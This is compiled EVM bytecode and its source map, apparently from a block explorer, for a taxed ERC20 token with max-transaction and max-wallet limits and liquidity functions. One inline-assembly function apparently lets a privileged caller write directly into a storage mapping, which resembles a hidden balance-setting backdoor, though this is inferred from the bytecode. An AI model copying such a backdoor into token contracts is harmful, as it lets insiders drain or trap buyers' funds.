8473ffffffffffffffffffffffffffffffffffffffff1614155b1561126657600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16148015610e4b5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610ea15750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015610ef75750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15610ff157610f27612710610f196001546004546119ea90919063ffffffff16565b611a0090919063ffffffff16565b831115610f69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6090612116565b60405180910390fd5b610f94612710610f866005546004546119ea90919063ffffffff16565b611a0090919063ffffffff16565b610faf84610fa1876107ad565b610b3090919063ffffffff16565b1115610ff0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe7906121a8565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561107a57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b1561111a576110a861271061109a600e54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b91506110d36127106110c5600d54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156111c55750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611265576111f36127106111e5600e54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b915061121e612710611210600f54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b600061127b8284610b3090919063ffffffff16565b9050600081111561141a57600083111561129a576112998684611620565b5b6000821115611404576113178260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b3090919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113fb9190611d22565b60405180910390a35b6114178185611b3c90919063ffffffff16565b93505b6114868460405180606001604052806026815260200161268360269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061151b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b3090919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516115bb9190611d22565b60405180910390a3505050505050565b6000838311158290611613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160a9190611be2565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361168f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116869061223a565b60405180910390fd5b6116fb8160405180606001604052806022815260200161266160229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061175381600454611b3c90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516117b79190611d22565b60405180910390a35050565b6117cb610b46565b73ffffffffffffffffffffffffffffffffffffffff166117e9610866565b73ffffffffffffffffffffffffffffffffffffffff161461183f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611836906122a6565b60405180910390fd5b565b61186e30600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610b4e565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230856000806118ba610866565b426040518863ffffffff1660e01b81526004016118dc9695949392919061230b565b60606040518083038185885af11580156118fa573d6000803e3d6000fd5b50505050506040513d601f19601f8201168201806040525081019061191f9190612381565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836119f891906123d4565b905092915050565b60008183611a0e9190612445565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a7c906124e8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611af4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aeb9061257a565b60405180910390fd5b60008111611b37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b2e9061260c565b60405180910390fd5b505050565b60008183611b4a919061262c565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611b8c578082015181840152602081019050611b71565b60008484015250505050565b6000601f19601f8301169050919050565b6000611bb482611b52565b611bbe8185611b5d565b9350611bce818560208601611b6e565b611bd781611b98565b840191505092915050565b60006020820190508181036000830152611bfc8184611ba9565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611c3482611c09565b9050919050565b611c4481611c29565b8114611c4f57600080fd5b50565b600081359050611c6181611c3b565b92915050565b6000819050919050565b611c7a81611c67565b8114611c8557600080fd5b50565b600081359050611c9781611c71565b92915050565b60008060408385031215611cb457611cb3611c04565b5b6000611cc285828601611c52565b9250506020611cd385828601611c88565b9150509250929050565b60008115159050919050565b611cf281611cdd565b82525050565b6000602082019050611d0d6000830184611ce9565b92915050565b611d1c81611c67565b82525050565b6000602082019050611d376000830184611d13565b92915050565b600080600060608486031215611d5657611d55611c04565b5b6000611d6486828701611c52565b9350506020611d7586828701611c52565b9250506040611d8686828701611c88565b9150509250925092565b600060ff82169050919050565b611da681611d90565b82525050565b6000602082019050611dc16000830184611d9d565b92915050565b600060208284031215611ddd57611ddc611c04565b5b6000611deb84828501611c88565b91505092915050565b600060208284031215611e0a57611e09611c04565b5b6000611e1884828501611c52565b91505092915050565b611e2a81611c29565b82525050565b6000602082019050611e456000830184611e21565b92915050565b60008060408385031215611e6257611e61611c04565b5b6000611e7085828601611c52565b9250506020611e8185828601611c52565b9150509250929050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611ee7602683611b5d565b9150611ef282611e8b565b604082019050919050565b60006020820190508181036000830152611f1681611eda565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611f5782611c67565b9150611f6283611c67565b9250828201905080821115611f7a57611f79611f1d565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611fdc602483611b5d565b9150611fe782611f80565b604082019050919050565b6000602082019050818103600083015261200b81611fcf565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061206e602283611b5d565b915061207982612012565b604082019050919050565b6000602082019050818103600083015261209d81612061565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b6000612100602883611b5d565b915061210b826120a4565b604082019050919050565b6000602082019050818103600083015261212f816120f3565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612192602383611b5d565b915061219d82612136565b604082019050919050565b600060208201905081810360008301526121c181612185565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000612224602183611b5d565b915061222f826121c8565b604082019050919050565b6000602082019050818103600083015261225381612217565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612290602083611b5d565b915061229b8261225a565b602082019050919050565b600060208201905081810360008301526122bf81612283565b9050919050565b6000819050919050565b6000819050919050565b60006122f56122f06122eb846122c6565b6122d0565b611c67565b9050919050565b612305816122da565b82525050565b600060c0820190506123206000830189611e21565b61232d6020830188611d13565b61233a60408301876122fc565b61234760608301866122fc565b6123546080830185611e21565b61236160a0830184611d13565b979650505050505050565b60008151905061237b81611c71565b92915050565b60008060006060848603121561239a57612399611c04565b5b60006123a88682870161236c565b93505060206123b98682870161236c565b92505060406123ca8682870161236c565b9150509250925092565b60006123df82611c67565b91506123ea83611c67565b92508282026123f881611c67565b9150828204841483151761240f5761240e611f1d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061245082611c67565b915061245b83611c67565b92508261246b5761246a612416565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006124d2602583611b5d565b91506124dd82612476565b604082019050919050565b60006020820190508181036000830152612501816124c5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612564602383611b5d565b915061256f82612508565b604082019050919050565b6000602082019050818103600083015261259381612557565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006125f6602983611b5d565b91506126018261259a565b604082019050919050565b60006020820190508181036000830152612625816125e9565b9050919050565b600061263782611c67565b915061264283611c67565b925082820390508181111561265a57612659611f1d565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212203532506c86fef4511986c5e1f558998d64ecb308d4d70b298c4f1f7d2b41190a64736f6c63430008110033
Deployed Bytecode Sourcemap
20150:11303:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;30732:10;;;;;;;;;;20150:11303;;;;;22779:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23541:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23432:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24365:321;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22871:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23996:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28197:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30854:270;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23146:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2722:103;;;;;;;;;;;;;:::i;:::-;;24223:133;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26938:96;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2072:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22684;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23718:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22963:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30205:373;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30758:84;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27727:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23273:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2981:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22779:83;22816:13;22849:5;;;;;;;;;;;;;;;;;22842:12;;22779:83;:::o;23541:169::-;23624:4;23641:39;23650:12;:10;:12::i;:::-;23664:7;23673:6;23641:8;:39::i;:::-;23698:4;23691:11;;23541:169;;;;:::o;23432:100::-;23485:7;23512:12;;23505:19;;23432:100;:::o;24365:321::-;24471:4;24488:36;24498:6;24506:9;24517:6;24488:9;:36::i;:::-;24535:121;24544:6;24552:12;:10;:12::i;:::-;24566:89;24604:6;24566:89;;;;;;;;;;;;;;;;;:11;:19;24578:6;24566:19;;;;;;;;;;;;;;;:33;24586:12;:10;:12::i;:::-;24566:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;24535:8;:121::i;:::-;24674:4;24667:11;;24365:321;;;;;:::o;22871:83::-;22912:5;20388:2;22930:16;;22871:83;:::o;23996:218::-;24084:4;24101:83;24110:12;:10;:12::i;:::-;24124:7;24133:50;24172:10;24133:11;:25;24145:12;:10;:12::i;:::-;24133:25;;;;;;;;;;;;;;;:34;24159:7;24133:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;24101:8;:83::i;:::-;24202:4;24195:11;;23996:218;;;;:::o;28197:91::-;28253:27;28259:12;:10;:12::i;:::-;28273:6;28253:5;:27::i;:::-;28197:91;:::o;30854:270::-;1957:13;:11;:13::i;:::-;30630:4:::1;30619:8;;:15;;;;;;;;;;;;;;;;;;30996:46:::2;31006:7;:5;:7::i;:::-;31023:4;31030:11;30996:9;:46::i;:::-;31079:37;31093:11;31106:9;31079:13;:37::i;:::-;30668:5:::1;30657:8;;:16;;;;;;;;;;;;;;;;;;30854:270:::0;:::o;23146:119::-;23212:7;23239:9;:18;23249:7;23239:18;;;;;;;;;;;;;;;;23232:25;;23146:119;;;:::o;2722:103::-;1957:13;:11;:13::i;:::-;2787:30:::1;2814:1;2787:18;:30::i;:::-;2722:103::o:0;24223:133::-;24267:7;24294:54;21042:5;24294:40;24311:22;;24294:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;24287:61;;24223:133;:::o;26938:96::-;26985:7;27012:14;;;;;;;;;;;27005:21;;26938:96;:::o;2072:87::-;2118:7;2145:6;;;;;;;;;;;2138:13;;2072:87;:::o;22684:::-;22723:13;22756:7;;;;;;;;;;;;;;;;;22749:14;;22684:87;:::o;23718:269::-;23811:4;23828:129;23837:12;:10;:12::i;:::-;23851:7;23860:96;23899:15;23860:96;;;;;;;;;;;;;;;;;:11;:25;23872:12;:10;:12::i;:::-;23860:25;;;;;;;;;;;;;;;:34;23886:7;23860:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;23828:8;:129::i;:::-;23975:4;23968:11;;23718:269;;;;:::o;22963:175::-;23049:4;23066:42;23076:12;:10;:12::i;:::-;23090:9;23101:6;23066:9;:42::i;:::-;23126:4;23119:11;;22963:175;;;;:::o;30205:373::-;30297:21;30291:28;30281:8;30278:42;30268:68;;30333:1;30330;30323:12;30268:68;30363:4;30357:11;30390:8;30385:3;30378:21;30435:14;30428:4;30423:3;30419:14;30412:38;30487:4;30482:3;30472:20;30515:6;30509:4;30502:20;30564:4;30558;30554:15;30539:13;30532:38;30267:304;;30205:373;:::o;30758:84::-;30802:4;30826:8;;;;;;;;;;;30819:15;;30758:84;:::o;27727:109::-;27776:7;27811:16;;;;;;;;;;;27796:32;;27727:109;:::o;23273:151::-;23362:7;23389:11;:18;23401:5;23389:18;;;;;;;;;;;;;;;:27;23408:7;23389:27;;;;;;;;;;;;;;;;23382:34;;23273:151;;;;:::o;2981:201::-;1957:13;:11;:13::i;:::-;3090:1:::1;3070:22;;:8;:22;;::::0;3062:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3146:28;3165:8;3146:18;:28::i;:::-;2981:201:::0;:::o;12269:98::-;12327:7;12358:1;12354;:5;;;;:::i;:::-;12347:12;;12269:98;;;;:::o;612:::-;665:7;692:10;685:17;;612:98;:::o;27844:344::-;27963:1;27946:19;;:5;:19;;;27938:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;28044:1;28025:21;;:7;:21;;;28017:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;28126:6;28096:11;:18;28108:5;28096:18;;;;;;;;;;;;;;;:27;28115:7;28096:27;;;;;;;;;;;;;;;:36;;;;28164:7;28148:32;;28157:5;28148:32;;;28173:6;28148:32;;;;;;:::i;:::-;;;;;;;;27844:344;;;:::o;24722:2207::-;24820:42;24836:6;24844:9;24855:6;24820:15;:42::i;:::-;24873:15;24903:14;24946:7;:5;:7::i;:::-;24936:17;;:6;:17;;;;:41;;;;;24970:7;:5;:7::i;:::-;24957:20;;:9;:20;;;;24936:41;24932:1301;;;25026:14;;;;;;;;;;;25016:24;;:6;:24;;;:83;;;;;25082:16;;;;;;;;;;;25061:38;;:9;:38;;;;25016:83;:130;;;;;25121:14;:25;25136:9;25121:25;;;;;;;;;;;;;;;;;;;;;;;;;25120:26;25016:130;:174;;;;;25168:14;:22;25183:6;25168:22;;;;;;;;;;;;;;;;;;;;;;;;;25167:23;25016:174;24994:528;;;25243:54;21042:5;25243:40;25260:22;;25243:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;25233:6;:64;;25225:117;;;;;;;;;;;;:::i;:::-;;;;;;;;;25407:59;21042:5;25407:45;25424:27;;25407:12;;:16;;:45;;;;:::i;:::-;:49;;:59;;;;:::i;:::-;25371:32;25396:6;25371:20;25381:9;25371;:20::i;:::-;:24;;:32;;;;:::i;:::-;:95;;25363:143;;;;;;;;;;;;:::i;:::-;;;;;;;;;24994:528;25595:14;;;;;;;;;;;25582:27;;:9;:27;;;:71;;;;;25648:4;25630:23;;:6;:23;;;;25582:71;25560:307;;;25698:34;21042:5;25698:20;25709:8;;25698:6;:10;;:20;;;;:::i;:::-;:24;;:34;;;;:::i;:::-;25688:44;;25760:34;21042:5;25760:20;25771:8;;25760:6;:10;;:20;;;;:::i;:::-;:24;;:34;;;;:::i;:::-;25751:43;;25839:12;25813;:23;25826:9;25813:23;;;;;;;;;;;;;;;:38;;;;25560:307;25936:14;;;;;;;;;;;25926:24;;:6;:24;;;:83;;;;;25992:16;;;;;;;;;;;25971:38;;:9;:38;;;;25926:83;25904:318;;;26054:34;21042:5;26054:20;26065:8;;26054:6;:10;;:20;;;;:::i;:::-;:24;;:34;;;;:::i;:::-;26044:44;;26116:33;21042:5;26116:19;26127:7;;26116:6;:10;;:19;;;;:::i;:::-;:23;;:33;;;;:::i;:::-;26107:42;;26194:12;26168;:23;26181:9;26168:23;;;;;;;;;;;;;;;:38;;;;25904:318;24932:1301;26243:16;26262:19;26274:6;26262:7;:11;;:19;;;;:::i;:::-;26243:38;;26307:1;26296:8;:12;26292:368;;;26339:1;26329:7;:11;26325:74;;;26361:22;26367:6;26375:7;26361:5;:22::i;:::-;26325:74;26429:1;26420:6;:10;26416:186;;;26481:39;26513:6;26481:9;:27;26491:16;;;;;;;;;;;26481:27;;;;;;;;;;;;;;;;:31;;:39;;;;:::i;:::-;26451:9;:27;26461:16;;;;;;;;;;;26451:27;;;;;;;;;;;;;;;:69;;;;26561:16;;;;;;;;;;;26544:42;;26553:6;26544:42;;;26579:6;26544:42;;;;;;:::i;:::-;;;;;;;;26416:186;26628:20;26639:8;26628:6;:10;;:20;;;;:::i;:::-;26619:29;;26292:368;26693:108;26729:6;26693:108;;;;;;;;;;;;;;;;;:9;:17;26703:6;26693:17;;;;;;;;;;;;;;;;:21;;:108;;;;;:::i;:::-;26673:9;:17;26683:6;26673:17;;;;;;;;;;;;;;;:128;;;;26835:32;26860:6;26835:9;:20;26845:9;26835:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;26812:9;:20;26822:9;26812:20;;;;;;;;;;;;;;;:55;;;;26903:9;26886:35;;26895:6;26886:35;;;26914:6;26886:35;;;;;;:::i;:::-;;;;;;;;24809:2120;;;24722:2207;;;:::o;14553:240::-;14673:7;14731:1;14726;:6;;14734:12;14718:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;14773:1;14769;:5;14762:12;;14553:240;;;;;:::o;27042:354::-;27145:1;27126:21;;:7;:21;;;27118:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;27217:68;27240:6;27217:68;;;;;;;;;;;;;;;;;:9;:18;27227:7;27217:18;;;;;;;;;;;;;;;;:22;;:68;;;;;:::i;:::-;27196:9;:18;27206:7;27196:18;;;;;;;;;;;;;;;:89;;;;27311:24;27328:6;27311:12;;:16;;:24;;;;:::i;:::-;27296:12;:39;;;;27377:1;27351:37;;27360:7;27351:37;;;27381:6;27351:37;;;;;;:::i;:::-;;;;;;;;27042:354;;:::o;2238:132::-;2313:12;:10;:12::i;:::-;2302:23;;:7;:5;:7::i;:::-;:23;;;2294:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2238:132::o;28546:429::-;28693:63;28710:4;28725:16;;;;;;;;;;;28744:11;28693:8;:63::i;:::-;28767:16;;;;;;;;;;;:32;;;28808:9;28841:4;28861:11;28887:1;28903;28919:7;:5;:7::i;:::-;28941:15;28767:200;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;28546:429;;:::o;3343:191::-;3417:16;3436:6;;;;;;;;;;;3417:25;;3462:8;3453:6;;:17;;;;;;;;;;;;;;;;;;3517:8;3486:40;;3507:8;3486:40;;;;;;;;;;;;3406:128;3343:191;:::o;13009:98::-;13067:7;13098:1;13094;:5;;;;:::i;:::-;13087:12;;13009:98;;;;:::o;13409:::-;13467:7;13498:1;13494;:5;;;;:::i;:::-;13487:12;;13409:98;;;;:::o;31132:318::-;31248:1;31232:18;;:4;:18;;;31224:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;31325:1;31311:16;;:2;:16;;;31303:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;31395:1;31386:6;:10;31378:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;31132:318;;;:::o;12651:98::-;12709:7;12740:1;12736;:5;;;;:::i;:::-;12729:12;;12651:98;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:::-;5247:6;5296:2;5284:9;5275:7;5271:23;5267:32;5264:119;;;5302:79;;:::i;:::-;5264:119;5422:1;5447:53;5492:7;5483:6;5472:9;5468:22;5447:53;:::i;:::-;5437:63;;5393:117;5188:329;;;;:::o;5523:118::-;5610:24;5628:5;5610:24;:::i;:::-;5605:3;5598:37;5523:118;;:::o;5647:222::-;5740:4;5778:2;5767:9;5763:18;5755:26;;5791:71;5859:1;5848:9;5844:17;5835:6;5791:71;:::i;:::-;5647:222;;;;:::o;5875:474::-;5943:6;5951;6000:2;5988:9;5979:7;5975:23;5971:32;5968:119;;;6006:79;;:::i;:::-;5968:119;6126:1;6151:53;6196:7;6187:6;6176:9;6172:22;6151:53;:::i;:::-;6141:63;;6097:117;6253:2;6279:53;6324:7;6315:6;6304:9;6300:22;6279:53;:::i;:::-;6269:63;;6224:118;5875:474;;;;;:::o;6355:225::-;6495:34;6491:1;6483:6;6479:14;6472:58;6564:8;6559:2;6551:6;6547:15;6540:33;6355:225;:::o;6586:366::-;6728:3;6749:67;6813:2;6808:3;6749:67;:::i;:::-;6742:74;;6825:93;6914:3;6825:93;:::i;:::-;6943:2;6938:3;6934:12;6927:19;;6586:366;;;:::o;6958:419::-;7124:4;7162:2;7151:9;7147:18;7139:26;;7211:9;7205:4;7201:20;7197:1;7186:9;7182:17;7175:47;7239:131;7365:4;7239:131;:::i;:::-;7231:139;;6958:419;;;:::o;